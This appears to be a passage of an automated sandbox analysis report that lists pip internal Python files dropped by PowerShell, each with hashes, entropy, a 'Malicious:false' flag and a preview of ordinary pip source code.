                                                                                                                                                                                                                      Preview:import logging.import os.path.from typing import List, Optional..from pip._internal.cli.spinners import open_spinner.from pip._internal.utils.setuptools_build import make_setuptools_bdist_wheel_args.from pip._internal.utils.subprocess import call_subprocess, format_command_args..logger = logging.getLogger(__name__)...def format_command_result(. command_args: List[str],. command_output: str,.) -> str:. """Format command information for logging.""". command_desc = format_command_args(command_args). text = f"Command arguments: {command_desc}\n".. if not command_output:. text += "Command output: None". elif logger.getEffectiveLevel() > logging.DEBUG:. text += "Command output: [use --verbose to show]". else:. if not command_output.endswith("\n"):. command_output += "\n". text += f"Command output:\n{command_output}".. return text...def get_legacy_build_wheel_path(. names: List[str],. temp_dir: str,. name: str,. com
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6806
                                                                                                                                                                                                                      Entropy (8bit):4.482733839291248
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:kWH42xp5561FL56bMEHANrxR66YyvtsXS3y5PLEuLDMqaj7/ADyRWNQTJhDxE:kWNxFMFFQMrPyyvipi/AAWNQFtS
                                                                                                                                                                                                                      MD5:F2F39E7FF5671C534F4F335E773B9C5A
                                                                                                                                                                                                                      SHA1:D97AC05828EE730EE5B14A6F6E28DCE98A4F0B96
                                                                                                                                                                                                                      SHA-256:7ECA80F3C8866AA7ED0ABDAD94FDEC494DB4D824A4A0E0D1B56D0EF8953D3386
                                                                                                                                                                                                                      SHA-512:F0BC7552E171ED2963A7B12F55E6652CF334B3FF27E57810737A73909174B58D99B216D1D9C3DE92619F6A7F08A9F59B0FFDAD1300192272B6AA7732005E66B5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Validation of dependencies of packages."""..import logging.from typing import Callable, Dict, List, NamedTuple, Optional, Set, Tuple..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import LegacySpecifier.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import LegacyVersion..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.metadata import get_default_environment.from pip._internal.metadata.base import DistributionVersion.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.deprecation import deprecated..logger = logging.getLogger(__name__)...class PackageDetails(NamedTuple):. version: DistributionVersion. dependencies: List[Requirement]...# Shorthands.PackageSet = Dict[NormalizedName, PackageDetails].Missing = Tuple[NormalizedName, Requirement].Conflicting = Tuple[NormalizedName, Distri
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9816
                                                                                                                                                                                                                      Entropy (8bit):4.064319785232956
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:wKXwcXVX29FLZPq1gaFYD8uDMNBrVbFhZ0DID53hC/rP3Wf3WFcdbvRMuPV:wKnIMev8ue2/rueFcdlh
                                                                                                                                                                                                                      MD5:7DD939A42B1612389F3D939F07D813B7
                                                                                                                                                                                                                      SHA1:BFC4FAB55E20829097432E39193CDC13C99A3D10
                                                                                                                                                                                                                      SHA-256:BAAA1E4C07FA1CE615311D948004FC37CE54668184544A1075A9FF028E9239F9
                                                                                                                                                                                                                      SHA-512:33F913AD806204AB63A5DD080A708B24362A0ED74A9958A0357A1BC505A9BA9EA4FB1497BDE8370AB12DD8AE9B64F15642DE91A077F1194485A6CD23CDA6C86E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import collections.import logging.import os.from typing import Container, Dict, Generator, Iterable, List, NamedTuple, Optional, Set..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version..from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.metadata import BaseDistribution, get_environment.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_from_line,.).from pip._internal.req.req_file import COMMENT_RE.from pip._internal.utils.direct_url_helpers import direct_url_as_pep440_direct_reference..logger = logging.getLogger(__name__)...class _EditableInfo(NamedTuple):. requirement: str. comments: List[str]...def freeze(. requirement: Optional[List[str]] = None,. local_only: bool = False,. user_only: bool = False,. paths: Optional[List[str]] = None,. isolated: bool = False,. exclude_editable: bool = False,. skip: Container[str] = (),.) -> Ge
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):51
                                                                                                                                                                                                                      Entropy (8bit):4.155090479515533
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:d/IF7CL5Dv:RI5CLdv
                                                                                                                                                                                                                      MD5:C6F771F71FE2E186FB048050F4D2E467
                                                                                                                                                                                                                      SHA1:C72C58E6CD7763F27AC8041D54F6390149AFC48E
                                                                                                                                                                                                                      SHA-256:997EE1C83D863413B69851A8903437D2BFC65EFED8FCF2DDB71714BF5E387BEB
                                                                                                                                                                                                                      SHA-512:A2A8D3F7862E8260EBC53B6670830104DCCD73A6292E1ECEF40379A167BAC510F81A3583C3AFA0EAAF6632BE771DCC54BE22F00330938B42B70B331DC42A9A0F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""For modules related to installing packages..""".
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):283
                                                                                                                                                                                                                      Entropy (8bit):5.097480360633831
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:LbaCCAI5CLf/Z6B0Wltqu95/n23d6oAreKAqAImZEqc6IaYleHXlll:naCC5cLp6BvPqg/2ImbsKYjaYkH1ll
                                                                                                                                                                                                                      MD5:D5CE77D0F9B9DB4D9E4A697A13F8725F
                                                                                                                                                                                                                      SHA1:B39D7F70958A440F0E19B73F806BD533292F2187
                                                                                                                                                                                                                      SHA-256:CDAE68BD366B698994B3F85E9E025A241AFA2787D7D641FF8D0192275FEDD5F6
                                                                                                                                                                                                                      SHA-512:825880ED48E235F8F679E12F5FC79922747D94247CD59EDCD4407D585F5E9DF178CCC78A1F2A61E154F6474C44782D0AF569297AE9F5B4080DDE691D5E7F5032
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e3...............................d.Z.y.).z,For modules related to installing packages..N)...__doc__........}C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/install/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1834
                                                                                                                                                                                                                      Entropy (8bit):5.6346571894683795
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:/+qkNlXWRZR+0NtpdI1QPEz98Q2mBs8C7CphPtIf:AXGRn+iJkQPEz98oZhC
                                                                                                                                                                                                                      MD5:4A43F85D3F3754A2A3AF92B60E980B54
                                                                                                                                                                                                                      SHA1:6429A2D6ECDA6445FAFC46C90E8D909C7AE5F5C6
                                                                                                                                                                                                                      SHA-256:044DA1BD75F49F6545F926C90C07ED7328C7C626FF1B1620997A25246CF9DE09
                                                                                                                                                                                                                      SHA-512:22B97B96A49D44FDF197DE4DDA5666294BB0B8AB70D47F0A6A4437F69C8BB2D22ED1C7FD7C98AA241C54C50A7770643C414DF47EDA3698A6B616EE7FBE0A61A0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e...............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.e.....d.e.e.....d.e.e.....d.e.d.e.d.e.d.e.d.e.d.e.d.d.f.d...Z.y.).z?Legacy editable installation process, i.e. `setup.py develop`.......N)...Optional..Sequence)...BuildEnvironment)...indent_log)...make_setuptools_develop_args)...call_subprocess..global_options..prefix..home..use_user_site..name..setup_py_path..isolated..build_env..unpacked_source_directory..returnc...........................t.........j...................d.|...........t.........|.|.|.|.|.|...........}.t.................5...|.5...t.........|.d.|.............d.d.d...........d.d.d...........y.#.1.s.w...Y.......x.Y.w.#.1.s.w...Y.....y.x.Y.w.).z[Install a package in editable mode. Most arguments are pass-through. to setuptools.. z.Running setup.py develop for %s).r......no_user_configr....r....r....z.python setup.py develop)...command_desc..cwdN)...logger..infor
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):33870
                                                                                                                                                                                                                      Entropy (8bit):5.393777289712567
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:1R2WOFlNE/3VJiJuhwT8o2pABLhcyoAe/rsl/d0Vkycqmeg38czQQAl9V8:BOFl6/PiACOIhpo3W1028cc9K
                                                                                                                                                                                                                      MD5:7EDF4E801F246D70E8C0204F15D424ED
                                                                                                                                                                                                                      SHA1:990B554ED295BE8DA3935360A2D0E5D7860B394E
                                                                                                                                                                                                                      SHA-256:0E8FBE3B5B265F4CB3CD05BE8D9E8E060659E1F4439728C1C1A154385179B54F
                                                                                                                                                                                                                      SHA-512:08ECEF89EF1B688568AFE718135161CA6DB309B0AF1A55878A08C24560505E29C5540A908EAEE0C0BB152E7C7E3D1370D679EA9E0E5907AC8281E9475DB5CC5C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e.j.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5m6Z6m7Z7..d.d.l8m9Z9m:Z:..d.d.l;m<Z<m=Z=..d.d.l>m?Z?m@Z@..d.d.lAmBZBmCZCmDZDmEZE..d.d.lFmGZGmHZHmIZImJZJ..d.d.lKmLZL..e.r.d.d.l.mMZM....G.d...d.eM........ZN..e.j...................eP........ZQ..e d.eR........ZSe$eSeRe%eTeRf.....f.....ZUdId.eRd.eTd.e$eReRf.....f.d...ZVd.eRd.e.eRe.f.....f.d...ZWd.eRd.eXf.d...ZYd.e.d.eXf.d ..ZZd!e5d.e$e.eReRf.....e.eReRf.....f.....f.d"..Z[d#e"eR....d.e!eR....f.d$..Z\d%e.eU....d.e.e$eReReRf.........f.d&..Z]d'eSd(eRd.eRf.d)..Z^d.eRd(eRd.eSf.d*..Z_d+e.e.eR........d,e.eSeSf.....d-e#eS....d.e.eR....d(eRd.e.eU....f.d/..Z`d0e.eReRf.....d.e.eR....f.d1..Za..G.d2..d3........Zb..G.d4..d5........Zc..G.d6..d7e1........Zdd8eRd.d.f.d9
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1282
                                                                                                                                                                                                                      Entropy (8bit):4.529425309919988
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:6NXahpouY2vZHVY/vPXIAavFw3pm8MUUKxmml97+ZyICoUC:iXaPXvZ1savi5m8JUNZyrC
                                                                                                                                                                                                                      MD5:DCB76A8AD093B7E45F58BE9D79106C59
                                                                                                                                                                                                                      SHA1:61A524BDA27C4AB0F2BD898903EE87E51D34F59A
                                                                                                                                                                                                                      SHA-256:61E47429A7565F0FD985E0B536D006D6A5481243A04461DCDB7C7E62D196ECD5
                                                                                                                                                                                                                      SHA-512:C00A2CF22BBDBEA5D024F1F2181A0D7557675A7B2C28B9DF9D58466E1E36111A6406D9F0D1587FA4D5E5FD07081580DB08D72DC26AA5A8B83709AD3D56EDAE8D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Legacy editable installation process, i.e. `setup.py develop`..""".import logging.from typing import Optional, Sequence..from pip._internal.build_env import BuildEnvironment.from pip._internal.utils.logging import indent_log.from pip._internal.utils.setuptools_build import make_setuptools_develop_args.from pip._internal.utils.subprocess import call_subprocess..logger = logging.getLogger(__name__)...def install_editable(. *,. global_options: Sequence[str],. prefix: Optional[str],. home: Optional[str],. use_user_site: bool,. name: str,. setup_py_path: str,. isolated: bool,. build_env: BuildEnvironment,. unpacked_source_directory: str,.) -> None:. """Install a package in editable mode. Most arguments are pass-through. to setuptools.. """. logger.info("Running setup.py develop for %s", name).. args = make_setuptools_develop_args(. setup_py_path,. global_options=global_options,. no_user_config=isolated,. prefix=pref
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):27311
                                                                                                                                                                                                                      Entropy (8bit):4.642708671405098
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:0GHMR/kRyVVi89DzT8O1WCqclVNe3nHCFvtoMWgCq2JTRH:0QI/bPnkVclVNe3H6hE1RH
                                                                                                                                                                                                                      MD5:F885BF99952E370232B260C8B3A4A2B0
                                                                                                                                                                                                                      SHA1:1CC61594079640CF319031BD5FD0F278ED519D1E
                                                                                                                                                                                                                      SHA-256:F6119BD5CE1B4673C86F6146EC2B5448F7CFC6AA6B987401B702009563CD4ED1
                                                                                                                                                                                                                      SHA-512:A16709DACFB9BAB959F2537C09B1673332F8A67DA65FF2877401E4768E83B34ABAE4B3E966A65ED1B04E7159B240AC4EFED0832E0300F396FD2F66D5B185D7D0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Support for installing and building the "wheel" binary package format.."""..import collections.import compileall.import contextlib.import csv.import importlib.import logging.import os.path.import re.import shutil.import sys.import warnings.from base64 import urlsafe_b64encode.from email.message import Message.from itertools import chain, filterfalse, starmap.from typing import (. IO,. TYPE_CHECKING,. Any,. BinaryIO,. Callable,. Dict,. Generator,. Iterable,. Iterator,. List,. NewType,. Optional,. Sequence,. Set,. Tuple,. Union,. cast,.).from zipfile import ZipFile, ZipInfo..from pip._vendor.distlib.scripts import ScriptMaker.from pip._vendor.distlib.util import get_export_entry.from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import InstallationError.from pip._internal.locations import get_major_minor_version.from pip._internal.metadata import (. BaseDistribution,. FilesystemWheel,. ge
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):28128
                                                                                                                                                                                                                      Entropy (8bit):4.3534757921233584
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:6wqVVk3BUI64dQw93NywZO6FK1pbSTB5wqCMrcAr4OVN3h5rgcyxK:sp8QZwZTccaqCM/rJVN3LgcmK
                                                                                                                                                                                                                      MD5:D47E3EB660F7DBCAEC2D8BB2BC871B01
                                                                                                                                                                                                                      SHA1:DC57A38D370F140ADFB08A5C8EDD2E35FF19EB40
                                                                                                                                                                                                                      SHA-256:E7B3AAF3B1DFBA75F745BAA9E3B15D689AFD7076C02949BFDE0BFB5A1040A9B1
                                                                                                                                                                                                                      SHA-512:7DF3547C12AB029CA0B7D2CF0FAC89CD65AC3273C347DACD1BE635F24FD690576015C7516326A650076D8A6507DCF0BA0D571598B2920BB4A8336435C847D3CB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Prepares a distribution for installation."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..import mimetypes.import os.import shutil.from pathlib import Path.from typing import Dict, Iterable, List, Optional..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.distributions.installed import InstalledDistribution.from pip._internal.exceptions import (. DirectoryUrlHashUnsupported,. HashMismatch,. HashUnpinned,. InstallationError,. MetadataInconsistent,. NetworkConnectionError,. VcsHashUnsupported,.).from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution, get_metadata_distribution.from pip._internal.models.direct_url import ArchiveInfo.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.netwo
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7152
                                                                                                                                                                                                                      Entropy (8bit):4.544558175493023
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:qWhBuxc89eeuB3bybJ9dlwdNHyYhf9QGpo5QZOv7Q4IY4LrMn4sNqXj/Qy8uO+ND:qWh5890mLw7ycf91SgE7QsnE/DNiMSg
                                                                                                                                                                                                                      MD5:EA947CFEEE9C6ADD3CA6D39E9EFA3C98
                                                                                                                                                                                                                      SHA1:E28E26069246AB43190B65A83D9A362D31623D07
                                                                                                                                                                                                                      SHA-256:E17B33A75D7182BD76EB2CC6E816C9034A1A43D597BA16F48F251BFB2FFA94F4
                                                                                                                                                                                                                      SHA-512:5FCF07C4A901B2D768996D1275E5B680706C6B703F7EE526A0A1EED8660C2E1F0DFC2C1564E19A07663C24F73D983FD43ACCFC3F82E57C6EC0DBB3B427436569
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import importlib.util.import os.from collections import namedtuple.from typing import Any, List, Optional..from pip._vendor import tomli.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement..from pip._internal.exceptions import (. InstallationError,. InvalidPyProjectBuildRequires,. MissingPyProjectBuildRequires,.)...def _is_list_of_str(obj: Any) -> bool:. return isinstance(obj, list) and all(isinstance(item, str) for item in obj)...def make_pyproject_path(unpacked_source_directory: str) -> str:. return os.path.join(unpacked_source_directory, "pyproject.toml")...BuildSystemDetails = namedtuple(. "BuildSystemDetails", ["requires", "backend", "check", "backend_path"].)...def load_pyproject_toml(. use_pep517: Optional[bool], pyproject_toml: str, setup_py: str, req_name: str.) -> Optional[BuildSystemDetails]:. """Load the pyproject.toml file... Parameters:. use_pep517 - Has the user requested PEP 517 processing? None.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2738
                                                                                                                                                                                                                      Entropy (8bit):4.326201740902436
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:dovZvw6xtd2ZhedgW+FbOjm+8CdCaksbZsIwZMtTwH8AXdjW:IxD122gW+Fbp+lCaksbpwmTQjW
                                                                                                                                                                                                                      MD5:90F6415749AEAC444FDC82A5D4A67413
                                                                                                                                                                                                                      SHA1:CF0EAD8F5FB907FC11C71DF8CBA39D7B2A024A1A
                                                                                                                                                                                                                      SHA-256:4C42C58193A87F796132668809558BF54ECF9615E8F4EB9FA246CC009E89D862
                                                                                                                                                                                                                      SHA-512:B85D577F6023DA280DF94ED9719FB64D804E0665EFC6014F5B3CF223D233966FFB9457A63A5CABE9BB097566314C42F46FB17E5B56F984154965F2A5A0BB6C02
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import collections.import logging.from typing import Generator, List, Optional, Sequence, Tuple..from pip._internal.utils.logging import indent_log..from .req_file import parse_requirements.from .req_install import InstallRequirement.from .req_set import RequirementSet..__all__ = [. "RequirementSet",. "InstallRequirement",. "parse_requirements",. "install_given_reqs",.]..logger = logging.getLogger(__name__)...class InstallationResult:. def __init__(self, name: str) -> None:. self.name = name.. def __repr__(self) -> str:. return f"InstallationResult(name={self.name!r})"...def _validate_requirements(. requirements: List[InstallRequirement],.) -> Generator[Tuple[str, InstallRequirement], None, None]:. for req in requirements:. assert req.name, f"invalid to-be-installed requirement: {req}". yield req.name, req...def install_given_reqs(. requirements: List[InstallRequirement],. global_options: Sequence[str],. root: Optional[str],.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19018
                                                                                                                                                                                                                      Entropy (8bit):4.5153846504298185
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:bYk+ErtWMTIHs16EvJT7HpPw1FZresif6kckMFvGAgBCl4q:Drw57Wtoib/tAhL
                                                                                                                                                                                                                      MD5:18D03004D257F83A9E3D4110530F71F3
                                                                                                                                                                                                                      SHA1:95D491FF36169C0C5FFFE9AEE67B6A6FD10BECD9
                                                                                                                                                                                                                      SHA-256:F21958E7A8A612D84B3914709A5A322B3DD83B25F298868AB0D07A3FD7B0BCD2
                                                                                                                                                                                                                      SHA-512:5CA7D9B1309EE20B72D63534480740CAD441571AA4AE2695157849DC263657C1AED2087FB871D8B4EC990D2AB0A1C5D593680ACD2669190FF58999987C99895B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Backing implementation for InstallRequirement's various constructors..The idea here is that these formed a major chunk of InstallRequirement's size.so, moving them and support code dedicated to them outside of that class.helps creates for better understandability for the rest of the code...These are meant to be used elsewhere within pip to create instances of.InstallRequirement.."""..import copy.import logging.import os.import re.from typing import Collection, Dict, List, Optional, Set, Tuple, Union..from pip._vendor.packaging.markers import Marker.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement.from pip._vendor.packaging.specifiers import Specifier..from pip._internal.exceptions import InstallationError.from pip._internal.models.index import PyPI, TestPyPI.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.req.req_file import ParsedRequirement.from pip._internal.req.req_install import InstallRequ
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):17790
                                                                                                                                                                                                                      Entropy (8bit):4.538498148383151
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:u0aYhgUFZckXTdrk01YlroGD5CIPwSwiwv2+90P:uwZ/jdfs1tPwS/HP
                                                                                                                                                                                                                      MD5:236D5B49A91A74A3AD27F50FA3FA2C3C
                                                                                                                                                                                                                      SHA1:3BA2944C19D21912A4DA5ECFAF37EA692CCF1AC3
                                                                                                                                                                                                                      SHA-256:33CB6D3992FE3F0023EEC70F125856DD90F68620FD9A6FFA14900621BC00CC42
                                                                                                                                                                                                                      SHA-512:DCF14E141C1A2239E9CB3D0D1AFD89E2A6DCF1D3BA8F01D59D318382F2082CD4F4077948F4FB97C3318C6CF1993D4C4B1FFD9570D82B5B6C69C15B500AA122B5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:""".Requirements file parsing."""..import logging.import optparse.import os.import re.import shlex.import urllib.parse.from optparse import Values.from typing import (. TYPE_CHECKING,. Any,. Callable,. Dict,. Generator,. Iterable,. List,. Optional,. Tuple,.)..from pip._internal.cli import cmdoptions.from pip._internal.exceptions import InstallationError, RequirementsFileParseError.from pip._internal.models.search_scope import SearchScope.from pip._internal.network.session import PipSession.from pip._internal.network.utils import raise_for_status.from pip._internal.utils.encoding import auto_decode.from pip._internal.utils.urls import get_url_scheme..if TYPE_CHECKING:. # NoReturn introduced in 3.6.2; imported only for type checking to maintain. # pip compatibility with older patch versions of Python 3.6. from typing import NoReturn.. from pip._internal.index.package_finder import PackageFinder..__all__ = ["parse_requirements"]..ReqFileLines = Itera
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35460
                                                                                                                                                                                                                      Entropy (8bit):4.349820575274182
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:z+M0Pf6CKYptCGjRZMBm5m3ojz2JQw9u3W/3:zm6mptCWUqz2J9J/3
                                                                                                                                                                                                                      MD5:DA54C14920379FE466FF0DA19B7028AC
                                                                                                                                                                                                                      SHA1:9C22316E093B009D97FE5D36431C31099BF5CCA7
                                                                                                                                                                                                                      SHA-256:C2D38FC64C9148CF1CA264E4B3CA0BD46A76A321AA6C7EC9C080D1722D9088F9
                                                                                                                                                                                                                      SHA-512:F9DBEB8B249146AC2EA96C6BA277EA0F182E134DC8FC0570FC09642151E92E50A44626E90B5E4FBD52BE77C8DB48486C038063580B2065AAD954069336E41BDF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import functools.import logging.import os.import shutil.import sys.import uuid.import zipfile.from optparse import Values.from pathlib import Path.from typing import Any, Collection, Dict, Iterable, List, Optional, Sequence, Union..from pip._vendor.packaging.markers import Marker.from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version.from pip._vendor.packaging.version import parse as parse_version.from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment, NoOpBuildEnvironment.from pip._internal.exceptions import InstallationError, PreviousBuildDirError.from pip._internal.locations import get_scheme.from pip._internal.metadata import (. BaseDistribution,. get_default_environment,. get_directory_distribution,. get_wheel_distribution,.).from pip._inter
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4704
                                                                                                                                                                                                                      Entropy (8bit):4.216083028637518
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:yqtq84IDbgjQvJUjASvpC319hi9uDh4FoN7z+ULtYKP/g23syOygj:dX73g+J2XI319sih20a2d/jlOyU
                                                                                                                                                                                                                      MD5:0ADC2DA9F4F72B393701262DF03D5961
                                                                                                                                                                                                                      SHA1:49A3ABAB94A935BDC119F167997A24FBF9417B41
                                                                                                                                                                                                                      SHA-256:88C603513A12824C45CAB3FF3AB4ED3D2830E1DC234721910E91A8A13A9E0386
                                                                                                                                                                                                                      SHA-512:DF5B6A8A61C2CBA426339D5633E81E29CD52C8DA8639D2E72BC0EF99E7AD29AF3597D71852C9BF963F15E7752BE6D3793C8B92BD86ACD74378D1F97BC1F0FD88
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import logging.from collections import OrderedDict.from typing import Dict, List..from pip._vendor.packaging.specifiers import LegacySpecifier.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import LegacyVersion..from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.deprecation import deprecated..logger = logging.getLogger(__name__)...class RequirementSet:. def __init__(self, check_supported_wheels: bool = True) -> None:. """Create a RequirementSet.""".. self.requirements: Dict[str, InstallRequirement] = OrderedDict(). self.check_supported_wheels = check_supported_wheels.. self.unnamed_requirements: List[InstallRequirement] = [].. def __str__(self) -> str:. requirements = sorted(. (req for req in self.requirements.values() if not req.comes_from),. key=lambda req: canonicalize_name(req.name or ""),. ). return " ".join(str(req.req) for
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):24551
                                                                                                                                                                                                                      Entropy (8bit):4.372446389382628
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:hd/9msLNLjyO1XZ8RvFuSjEiRMFfiGf0zdTjtAttm5QqglW:hd0sLpTGjECWqGf01jattm57glW
                                                                                                                                                                                                                      MD5:17F5E081F34812C1B3BDFCCAB3FBE0E7
                                                                                                                                                                                                                      SHA1:E3549EC01B2680F073048E2198EEBA53FAA5EEA5
                                                                                                                                                                                                                      SHA-256:9E6BD341A4420B48AEFB94F0D1D8E55C98528FA5A6A8746F4F7AA4904742DF91
                                                                                                                                                                                                                      SHA-512:A7414A1007A7845891F0C7CD6E5489CBB37BDF8F7BF72E8E0D2A7C788C4884D392A70C0DE121319C8A1F6E04996C3EC8E47ADAF27370D99D004A8D583688A5AD
                                                                                                                                                                                                                      Malicious:false
